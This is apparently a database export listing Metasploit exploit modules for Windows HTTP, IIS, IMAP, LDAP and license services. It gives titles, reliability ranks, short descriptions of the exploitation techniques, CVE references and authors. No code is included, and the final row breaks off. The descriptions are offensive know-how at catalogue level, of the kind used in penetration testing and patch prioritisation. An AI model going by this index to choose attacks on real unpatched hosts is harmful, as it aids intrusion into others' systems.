00:00:00",0,,"aggressive","t","EDB-19937, OSVDB-84310, URL-http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/","juan vazquez , mr.pr0n" 855,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sybase_easerver.rb","exploit","windows/http/sybase_easerver","exploit/windows/http/sybase_easerver","Sybase EAServer 5.2 Remote Stack Buffer Overflow",200,"This module exploits a stack buffer overflow in the Sybase EAServer Web Console. The offset to the SEH frame appears to change depending on what version of Java is in use by the remote server, making this exploit somewhat unreliable.","Metasploit Framework License (BSD)","f","2005-07-25 00:00:00",,,"aggressive","t","BID-14287, CVE-2005-2297, OSVDB-17996","Unknown" 856,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/sysax_create_folder.rb","exploit","windows/http/sysax_create_folder","exploit/windows/http/sysax_create_folder","Sysax Multi Server 5.64 Create Folder Buffer Overflow",300,"This module exploits a stack buffer overflow in the create folder function in Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the vulnerability valid credentials with the create folder permission must be provided. The HTTP option must be enabled on Sysax too. This module will log into the server, get a SID token, find the root folder, and then proceed to exploit the server. Successful exploits result in SYSTEM access. This exploit works on XP SP3, and Server 2003 SP1-SP2.","Metasploit Framework License (BSD)","t","2012-07-29 00:00:00",0,,"aggressive","t","EDB-18420, EDB-20676, OSVDB-82329, URL-http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html, URL-http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html","Craig Freyman, Matt ""hostess"" Andreko" 857,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/trackercam_phparg_overflow.rb","exploit","windows/http/trackercam_phparg_overflow","exploit/windows/http/trackercam_phparg_overflow","TrackerCam PHP Argument Buffer Overflow",200,"This module exploits a simple stack buffer overflow in the TrackerCam web server. All current versions of this software are vulnerable to a large number of security issues. This module abuses the directory traversal flaw to gain information about the system and then uses the PHP overflow to execute arbitrary code.","Metasploit Framework License (BSD)","t","2005-02-18 00:00:00",0,,"aggressive","t","BID-12592, CVE-2005-0478, OSVDB-13953, OSVDB-13955, URL-http://aluigi.altervista.org/adv/tcambof-adv.txt","hdm " 858,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/trendmicro_officescan.rb","exploit","windows/http/trendmicro_officescan","exploit/windows/http/trendmicro_officescan","Trend Micro OfficeScan Remote Stack Buffer Overflow",400,"This module exploits a stack buffer overflow in Trend Micro OfficeScan cgiChkMasterPwd.exe (running with SYSTEM privileges).","Metasploit Framework License (BSD)","f","2007-06-28 00:00:00",0,,"aggressive","t","CVE-2008-1365, OSVDB-42499","toto" 859,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/umbraco_upload_aspx.rb","exploit","windows/http/umbraco_upload_aspx","exploit/windows/http/umbraco_upload_aspx","Umbraco CMS Remote Command Execution",600,"This module can be used to execute a payload on Umbraco CMS 4.7.0.378. The payload is uploaded as an ASPX script by sending a specially crafted SOAP request to codeEditorSave.asmx, which permits unauthorised file upload via the SaveDLRScript operation. SaveDLRScript is also subject to a path traversal vulnerability, allowing code to be placed into the web-accessible /umbraco/ directory. The module writes, executes and then overwrites an ASPX script; note that though the script content is removed, the file remains on the target. Automatic cleanup of the file is intended if a meterpreter payload is used. This module has been tested successfully on Umbraco CMS 4.7.0.378 on a Windows 7 32-bit SP1. In this scenario, the ""IIS APPPOOL\ASP.NET v4.0"" user must have write permissions on the Windows Temp folder.","Metasploit Framework License (BSD)","f","2012-06-28 00:00:00",0,,"aggressive","t","URL-http://blog.gdssecurity.com/labs/2012/7/3/find-bugs-faster-with-a-webmatrix-local-reference-instance.html, URL-http://umbraco.codeplex.com/workitem/18192","Toby Clarke, juan vazquez " 860,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/webster_http.rb","exploit","windows/http/webster_http","exploit/windows/http/webster_http","Webster HTTP Server GET Buffer Overflow",200,"This exploits a stack buffer overflow in the Webster HTTP server. The server and source code was released within an article from the Microsoft Systems Journal in February 1996 titled ""Write a Simple HTTP-based Server Using MFC and Windows Sockets"".","Metasploit Framework License (BSD)","f","2002-12-02 00:00:00",0,,"aggressive","t","BID-6289, CVE-2002-2268, OSVDB-44106, URL-http://www.microsoft.com/msj/archive/s25f.aspx, URL-http://www.netdave.com/webster/webster.htm","patrick " 861,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/xampp_webdav_upload_php.rb","exploit","windows/http/xampp_webdav_upload_php","exploit/windows/http/xampp_webdav_upload_php","XAMPP WebDAV PHP Upload",600,"This module exploits weak WebDAV passwords on XAMPP servers. It uses supplied credentials to upload a PHP payload and execute it.","Metasploit Framework License (BSD)","f","2012-01-14 00:00:00",0,,"aggressive","t",,"theLightCosine " 862,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/xitami_if_mod_since.rb","exploit","windows/http/xitami_if_mod_since","exploit/windows/http/xitami_if_mod_since","Xitami 2.5c2 Web Server If-Modified-Since Overflow",200,"This module exploits a stack buffer overflow in the iMatix Corporation Xitami Web Server. If a malicious user sends an If-Modified-Since header containing an overly long string, it may be possible to execute a payload remotely. Due to size constraints, this module uses the Egghunter technique.","Metasploit Framework License (BSD)","f","2007-09-24 00:00:00",0,,"aggressive","t","BID-25772, CVE-2007-5067, EDB-4450, OSVDB-40594, OSVDB-40595","patrick " 863,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb","exploit","windows/http/zenworks_assetmgmt_uploadservlet","exploit/windows/http/zenworks_assetmgmt_uploadservlet","Novell ZENworks Asset Management Remote Execution",600,"This module exploits a path traversal flaw in Novell ZENworks Asset Management 7.5. By exploiting the CatchFileServlet, an attacker can upload a malicious file outside of the MalibuUploadDirectory and then make a secondary request that allows for arbitrary code execution.","Metasploit Framework License (BSD)","t","2011-11-02 00:00:00",0,,"aggressive","t","BID-50966, CVE-2011-2653, OSVDB-77583, URL-http://download.novell.com/Download?buildid=hPvHtXeNmCU~, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-342/","Unknown, juan vazquez " 864,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/http/zenworks_uploadservlet.rb","exploit","windows/http/zenworks_uploadservlet","exploit/windows/http/zenworks_uploadservlet","Novell ZENworks Configuration Management Remote Execution",600,"This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0. By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory and then make a secondary request that allows for arbitrary code execution.","Metasploit Framework License (BSD)","t","2010-03-30 00:00:00",0,,"aggressive","t","BID-39114, OSVDB-63412, URL-http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html, URL-http://www.novell.com/support/kb/doc.php?id=7005573, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-078/","MC " 865,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/iis_webdav_upload_asp.rb","exploit","windows/iis/iis_webdav_upload_asp","exploit/windows/iis/iis_webdav_upload_asp","Microsoft IIS WebDAV Write Access Code Execution",600,"This module can be used to execute a payload on IIS servers that have world-writeable directories. The payload is uploaded as an ASP script using a WebDAV PUT request.","Metasploit Framework License (BSD)","f","1994-01-01 00:00:00",0,,"aggressive","t","BID-12141, OSVDB-397","hdm " 866,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms01_023_printer.rb","exploit","windows/iis/ms01_023_printer","exploit/windows/iis/ms01_023_printer","Microsoft IIS 5.0 Printer Host Header Overflow",400,"This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This module works against Windows 2000 service pack 0 and 1. If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process.","Metasploit Framework License (BSD)","f","2001-05-01 00:00:00",0,,"aggressive","t","BID-2674, CVE-2001-0241, MSB-MS01-023, OSVDB-3323, URL-http://seclists.org/lists/bugtraq/2001/May/0005.html","hdm " 867,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms01_026_dbldecode.rb","exploit","windows/iis/ms01_026_dbldecode","exploit/windows/iis/ms01_026_dbldecode","Microsoft IIS/PWS CGI Filename Double Decode Command Execution",600,"This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. NOTE: This module will leave a metasploit payload in the IIS scripts directory.","Metasploit Framework License (BSD)","f","2001-05-15 00:00:00",0,,"aggressive","t","BID-2708, CVE-2001-0333, MSB-MS01-026, OSVDB-556, URL-http://marc.info/?l=bugtraq&m=98992056521300&w=2","jduck " 868,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms01_033_idq.rb","exploit","windows/iis/ms01_033_idq","exploit/windows/iis/ms01_033_idq","Microsoft IIS 5.0 IDQ Path Overflow",400,"This module exploits a stack buffer overflow in the IDQ ISAPI handler for Microsoft Index Server.","Metasploit Framework License (BSD)","f","2001-06-18 00:00:00",0,,"aggressive","t","BID-2880, CVE-2001-0500, MSB-MS01-033, OSVDB-568","MC " 869,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms02_018_htr.rb","exploit","windows/iis/ms02_018_htr","exploit/windows/iis/ms02_018_htr","Microsoft IIS 4.0 .HTR Path Overflow",400,"This exploits a buffer overflow in the ISAPI ISM.DLL used to process HTR scripting in IIS 4.0. This module works against Windows NT 4 Service Packs 3, 4, and 5. The server will continue to process requests until the payload being executed has exited. If you've set EXITFUNC to 'seh', the server will continue processing requests, but you will have trouble terminating a bind shell. If you set EXITFUNC to thread, the server will crash upon exit of the bind shell. The payload is alpha-numerically encoded without a NOP sled because otherwise the data gets mangled by the filters.","BSD License","t","2002-04-10 00:00:00",0,,"aggressive","t","BID-307, CVE-1999-0874, MSB-MS02-018, OSVDB-3325, URL-http://www.eeye.com/html/research/advisories/AD19990608.html","stinko " 870,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms02_065_msadc.rb","exploit","windows/iis/ms02_065_msadc","exploit/windows/iis/ms02_065_msadc","Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",300,"This module can be used to execute arbitrary code on IIS servers that expose the /msadc/msadcs.dll Microsoft Data Access Components (MDAC) Remote Data Service (RDS) DataFactory service. The service is exploitable even when RDS is configured to deny remote connections (handsafe.reg). The service is vulnerable to a heap overflow where the RDS DataStub 'Content-Type' string is overly long. Microsoft Data Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.","Metasploit Framework License (BSD)","f","2002-11-20 00:00:00",0,,"aggressive","t","BID-6214, CVE-2002-1142, MSB-MS02-065, OSVDB-14502, URL-http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html","patrick " 871,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb","exploit","windows/iis/ms03_007_ntdll_webdav","exploit/windows/iis/ms03_007_ntdll_webdav","Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow",500,"This exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. It should have a reasonable chance of success against any service pack.","Metasploit Framework License (BSD)","f","2003-05-30 00:00:00",0,,"aggressive","t","BID-7116, CVE-2003-0109, MSB-MS03-007, OSVDB-4467","hdm " 872,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/iis/msadc.rb","exploit","windows/iis/msadc","exploit/windows/iis/msadc","Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution",600,"This module can be used to execute arbitrary commands on IIS servers that expose the /msadc/msadcs.dll Microsoft Data Access Components (MDAC) Remote Data Service (RDS) DataFactory service using VbBusObj or AdvancedDataFactory to inject shell commands into Microsoft Access databases (MDBs), MSSQL databases and ODBC/JET Data Source Name (DSN). Based on the msadcs.pl v2 exploit by Rain.Forest.Puppy, which was actively used in the wild in the late Ninties. MDAC versions affected include MDAC 1.5, 2.0, 2.0 SDK, 2.1 and systems with the MDAC Sample Pages for RDS installed, and NT4 Servers with the NT Option Pack installed or upgraded 2000 systems often running IIS3/4/5 however some vulnerable installations can still be found on newer Windows operating systems. Note that newer releases of msadcs.dll can still be abused however by default remote connections to the RDS is denied. Consider using VERBOSE if you're unable to successfully execute a command, as the error messages are detailed and useful for debugging. Also set NAME to obtain the remote hostname, and METHOD to use the alternative VbBusObj technique.","Metasploit Framework License (BSD)","f","1998-07-17 00:00:00",0,,"aggressive","t","BID-529, CVE-1999-1011, MSB-MS98-004, MSB-MS99-025, OSVDB-272","patrick " 873,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/eudora_list.rb","exploit","windows/imap/eudora_list","exploit/windows/imap/eudora_list","Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow",500,"This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this particular vulnerability. NOTE: The service does NOT restart automatically by default. You may be limited to only one attempt, so choose wisely!","Metasploit Framework License (BSD)","t","2005-12-20 00:00:00",0,,"aggressive","t","BID-15980, CVE-2005-4267, OSVDB-22097","MC , jduck " 874,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/imail_delete.rb","exploit","windows/imap/imail_delete","exploit/windows/imap/imail_delete","IMail IMAP4D Delete Overflow",200,"This module exploits a buffer overflow in the 'DELETE' command of the the IMail IMAP4D service. This vulnerability can only be exploited with a valid username and password. This flaw was patched in version 8.14.","Metasploit Framework License (BSD)","t","2004-11-12 00:00:00",0,,"aggressive","t","BID-11675, CVE-2004-1520, OSVDB-11838","spoonm " 875,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/ipswitch_search.rb","exploit","windows/imap/ipswitch_search","exploit/windows/imap/ipswitch_search","Ipswitch IMail IMAP SEARCH Buffer Overflow",200,"This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. In order for this module to be successful, the IMAP user must have at least one message.","Metasploit Framework License (BSD)","t","2007-07-18 00:00:00",0,,"aggressive","t","BID-24962, CVE-2007-3925, OSVDB-36219","MC " 876,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mailenable_login.rb","exploit","windows/imap/mailenable_login","exploit/windows/imap/mailenable_login","MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow",500,"MailEnable's IMAP server contains a buffer overflow vulnerability in the Login command.","Metasploit Framework License (BSD)","t","2006-12-11 00:00:00",0,,"aggressive","t","BID-21492, CVE-2006-6423, OSVDB-32125, URL-http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051229.html","MC " 877,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mailenable_status.rb","exploit","windows/imap/mailenable_status","exploit/windows/imap/mailenable_status","MailEnable IMAPD (1.54) STATUS Request Buffer Overflow",500,"MailEnable's IMAP server contains a buffer overflow vulnerability in the STATUS command. With proper credentials, this could allow for the execution of arbitrary code.","Metasploit Framework License (BSD)","t","2005-07-13 00:00:00",0,,"aggressive","t","BID-14243, CVE-2005-2278, OSVDB-17844, URL-http://www.nessus.org/plugins/index.php?view=single&id=19193","MC " 878,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mailenable_w3c_select.rb","exploit","windows/imap/mailenable_w3c_select","exploit/windows/imap/mailenable_w3c_select","MailEnable IMAPD W3C Logging Buffer Overflow",500,"This module exploits a buffer overflow in the W3C logging functionality of the MailEnable IMAPD service. Logging is not enabled by default and this exploit requires a valid username and password to exploit the flaw. MailEnable Professional version 1.6 and prior and MailEnable Enterprise version 1.1 and prior are affected.","Metasploit Framework License (BSD)","t","2005-10-03 00:00:00",0,,"aggressive","t","BID-15006, CVE-2005-3155, OSVDB-19842","MC " 879,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mdaemon_cram_md5.rb","exploit","windows/imap/mdaemon_cram_md5","exploit/windows/imap/mdaemon_cram_md5","Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow",500,"This module exploits a buffer overflow in the CRAM-MD5 authentication of the MDaemon IMAP service. This vulnerability was discovered by Muts.","BSD License","t","2004-11-12 00:00:00",0,,"aggressive","t","BID-11675, CVE-2004-1520, OSVDB-11838","Unknown" 880,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mdaemon_fetch.rb","exploit","windows/imap/mdaemon_fetch","exploit/windows/imap/mdaemon_fetch","MDaemon 9.6.4 IMAPD FETCH Buffer Overflow",500,"This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP account credentials are required. Credit to Matteo Memelli","Metasploit Framework License (BSD)","f","2008-03-13 00:00:00",0,,"aggressive","t","BID-28245, CVE-2008-1358, EDB-5248, OSVDB-43111","Jacopo Cervini, patrick " 881,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mercur_imap_select_overflow.rb","exploit","windows/imap/mercur_imap_select_overflow","exploit/windows/imap/mercur_imap_select_overflow","Mercur v5.0 IMAP SP3 SELECT Buffer Overflow",200,"Mercur v5.0 IMAP server is prone to a remotely exploitable stack-based buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer. Credit to Tim Taylor for discover the vulnerability.","BSD License","t","2006-03-17 00:00:00",0,,"aggressive","t","BID-17138, CVE-2006-1255, OSVDB-23950","Jacopo Cervini " 882,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mercur_login.rb","exploit","windows/imap/mercur_login","exploit/windows/imap/mercur_login","Mercur Messaging 2005 IMAP Login Buffer Overflow",200,"This module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3. Since the room for shellcode is small, using the reverse ordinal payloads yields the best results.","Metasploit Framework License (BSD)","t","2006-03-17 00:00:00",0,,"aggressive","t","BID-17138, CVE-2006-1255, OSVDB-23950, URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html","MC " 883,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mercury_login.rb","exploit","windows/imap/mercury_login","exploit/windows/imap/mercury_login","Mercury/32 <= 4.01b LOGIN Buffer Overflow",200,"This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).","Metasploit Framework License (BSD)","t","2007-03-06 00:00:00",0,,"aggressive","t","CVE-2007-1373, OSVDB-33883","MC " 884,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/mercury_rename.rb","exploit","windows/imap/mercury_rename","exploit/windows/imap/mercury_rename","Mercury/32 v4.01a IMAP RENAME Buffer Overflow",200,"This module exploits a stack buffer overflow vulnerability in the Mercury/32 v.4.01a IMAP service.","Metasploit Framework License (BSD)","t","2004-11-29 00:00:00",,,"aggressive","t","BID-11775, CVE-2004-1211, OSVDB-12508, URL-http://www.nessus.org/plugins/index.php?view=single&id=15867","MC " 885,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/novell_netmail_append.rb","exploit","windows/imap/novell_netmail_append","exploit/windows/imap/novell_netmail_append","Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow",200,"This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","t","2006-12-23 00:00:00",0,,"aggressive","t","BID-21723, CVE-2006-6425, OSVDB-31362, URL-http://www.zerodayinitiative.com/advisories/ZDI-06-054.html","MC " 886,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/novell_netmail_auth.rb","exploit","windows/imap/novell_netmail_auth","exploit/windows/imap/novell_netmail_auth","Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow",200,"This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE GSSAPI command. By sending an overly long string, an attacker can overwrite the buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp or windows/shell_reverse_tcp allows for the most reliable results.","Metasploit Framework License (BSD)","t","2007-01-07 00:00:00",0,,"aggressive","t","OSVDB-55175, URL-http://www.w00t-shell.net/","MC " 887,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/novell_netmail_status.rb","exploit","windows/imap/novell_netmail_status","exploit/windows/imap/novell_netmail_status","Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow",200,"This module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","t","2005-11-18 00:00:00",0,,"aggressive","t","BID-15491, CVE-2005-3314, OSVDB-20956","MC " 888,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/imap/novell_netmail_subscribe.rb","exploit","windows/imap/novell_netmail_subscribe","exploit/windows/imap/novell_netmail_subscribe","Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow",200,"This module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution.","Metasploit Framework License (BSD)","t","2006-12-23 00:00:00",0,,"aggressive","t","BID-21728, CVE-2006-6761, OSVDB-31360, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454","MC " 889,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/isapi/ms00_094_pbserver.rb","exploit","windows/isapi/ms00_094_pbserver","exploit/windows/isapi/ms00_094_pbserver","Microsoft IIS Phone Book Service Overflow",400,"This is an exploit for the Phone Book Service /pbserver/pbserver.dll described in MS00-094. By sending an overly long URL argument for phone book updates, it is possible to overwrite the stack. This module has only been tested against Windows 2000 SP1.","Metasploit Framework License (BSD)","f","2000-12-04 00:00:00",0,,"aggressive","t","BID-2048, CVE-2000-1089, MSB-MS00-094, OSVDB-463","patrick " 890,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb","exploit","windows/isapi/ms03_022_nsiislog_post","exploit/windows/isapi/ms03_022_nsiislog_post","Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow",400,"This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.","Metasploit Framework License (BSD)","f","2003-06-25 00:00:00",0,,"aggressive","t","BID-8035, CVE-2003-0349, MSB-MS03-022, OSVDB-4535, URL-http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html","hdm " 891,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb","exploit","windows/isapi/ms03_051_fp30reg_chunked","exploit/windows/isapi/ms03_051_fp30reg_chunked","Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow",400,"This is an exploit for the chunked encoding buffer overflow described in MS03-051 and originally reported by Brett Moore. This particular modules works against versions of Windows 2000 between SP0 and SP3. Service Pack 4 fixes the issue.","Metasploit Framework License (BSD)","f","2003-11-11 00:00:00",0,,"aggressive","t","BID-9007, CVE-2003-0822, MSB-MS03-051, OSVDB-2952","hdm " 892,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/isapi/rsa_webagent_redirect.rb","exploit","windows/isapi/rsa_webagent_redirect","exploit/windows/isapi/rsa_webagent_redirect","Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",400,"This module exploits a stack buffer overflow in the SecurID Web Agent for IIS. This ISAPI filter runs in-process with inetinfo.exe, any attempt to exploit this flaw will result in the termination and potential restart of the IIS service.","Metasploit Framework License (BSD)","f","2005-10-21 00:00:00",0,,"aggressive","t","CVE-2005-4734, OSVDB-20151","hdm " 893,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/isapi/w3who_query.rb","exploit","windows/isapi/w3who_query","exploit/windows/isapi/w3who_query","Microsoft IIS ISAPI w3who.dll Query String Overflow",400,"This module exploits a stack buffer overflow in the w3who.dll ISAPI application. This vulnerability was discovered Nicolas Gregoire and this code has been successfully tested against Windows 2000 and Windows XP (SP2). When exploiting Windows XP, the payload must call RevertToSelf before it will be able to spawn a command shell.","Metasploit Framework License (BSD)","f","2004-12-06 00:00:00",0,,"aggressive","t","BID-11820, CVE-2004-1134, OSVDB-12258, URL-http://www.exaprobe.com/labs/advisories/esa-2004-1206.html","hdm " 894,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ldap/imail_thc.rb","exploit","windows/ldap/imail_thc","exploit/windows/ldap/imail_thc","IMail LDAP Service Buffer Overflow",200,"This exploits a buffer overflow in the LDAP service that is part of the IMail product. This module was tested against version 7.10 and 8.5, both running on Windows 2000.","Metasploit Framework License (BSD)","f","2004-02-17 00:00:00",0,,"aggressive","t","BID-9682, CVE-2004-0297, OSVDB-3984, URL-http://secunia.com/advisories/10880/","hdm " 895,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ldap/pgp_keyserver7.rb","exploit","windows/ldap/pgp_keyserver7","exploit/windows/ldap/pgp_keyserver7","Network Associates PGP KeyServer 7 LDAP Buffer Overflow",400,"This module exploits a stack buffer overflow in the LDAP service that is part of the NAI PGP Enterprise product suite. This module was tested against PGP KeyServer v7.0. Due to space restrictions, egghunter is used to find our payload - therefore you may wish to adjust WfsDelay.","Metasploit Framework License (BSD)","t","2001-07-16 00:00:00",0,,"aggressive","t","BID-3046, CVE-2001-1320, OSVDB-4742, URL-http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/","patrick " 896,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/license/calicclnt_getconfig.rb","exploit","windows/license/calicclnt_getconfig","exploit/windows/license/calicclnt_getconfig","Computer Associates License Client GETCONFIG Overflow",200,"This module exploits an vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug.","Metasploit Framework License (BSD)","t","2005-03-02 00:00:00",,,"aggressive","t","BID-12705, CVE-2005-0581, OSVDB-14389, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213","hdm , patrick " 897,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/license/calicserv_getconfig.rb","exploit","windows/license/calicserv_getconfig","exploit/windows/license/calicserv_getconfig","Computer Associates License Server GETCONFIG Overflow",300,"This module exploits an vulnerability in the CA License Server network service. By sending an excessively long GETCONFIG packet the stack may be overwritten.","Metasploit Framework License (BSD)","t","2005-03-02 00:00:00",,,"aggressive","t","BID-12705, CVE-2005-0581, OSVDB-14389, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213","hdm , patrick " 898,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/license/flexnet_lmgrd_bof.rb","exploit","windows/license/flexnet_lmgrd_bof","exploit/windows/license/flexnet_lmgrd_bof","FlexNet License Server Manager lmgrd Buffer Overflow",300,"This module exploits a vulnerability in the FlexNet License Server Manager. The vulnerability is due to the insecure usage of memcpy in the lmgrd service when handling network packets, which results in a stack buffer overflow. In order to improve reliability, this module will make lots of connections to lmgrd during each attempt to maximize its success.","Metasploit Framework License (BSD)","t","2012-03-23 00:00:00",1,,"aggressive","t","BID-52718, OSVDB-81899, URL-http://aluigi.altervista.org/adv/lmgrd_1-adv.txt, URL-http://www.flexerasoftware.com/pl/13057.htm, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-052/","Alexander Gavrun, Luigi Auriemma, juan vazquez , sinn3r " 899,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/license/sentinel_lm7_udp.rb","exploit","windows/license/sentinel_lm7_udp","exploit/windows/license/sentinel_lm7_udp","SentinelLM UDP Buffer Overflow",200,"This module exploits a simple stack buffer overflow in the Sentinel License Manager. The SentinelLM service is installed with a wide selection of products and seems particular popular with academic products. If the wrong target value is selected, the service will crash and not restart.","Metasploit Framework License (BSD)","t","2005-03-07 00:00:00",,,"aggressive","t","BID-12742, CVE-2005-0353, OSVDB-14605","hdm " 900,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb","exploit","windows/local/adobe_sandbox_adobecollabsync","exploit/windows/local/adobe_sandbox_adobecollabsync","AdobeCollabSync 